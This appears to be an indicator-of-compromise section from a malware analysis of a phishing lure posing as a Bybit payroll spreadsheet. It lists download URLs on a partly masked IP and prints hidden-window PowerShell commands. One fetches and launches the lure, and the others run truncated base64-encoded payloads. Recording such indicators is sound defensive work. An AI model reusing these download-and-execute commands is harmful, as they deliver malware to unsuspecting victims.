Technical Information
- http://42.###.7.101:8633/1.xls as %temp+/bybit工资清单 上海办公室.xls%
- %TEMP%\bybit工资清单 上海办公室.xls
- http://42.###.7.101:8633/1.xls via 42.##9.7.101
- http://42.###.7.101:7255/OAff via 42.##9.7.101
- http://42.###.7.101:7255/j.ad via 42.##9.7.101
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden (new-object System.Net.WebClient).DownloadFile('http://42.###.7.101:8633/1.xls',$env:temp+'/Bybit工资清单 上海办公室.xls');Start-Process $env:temp'/B...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASA...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASA...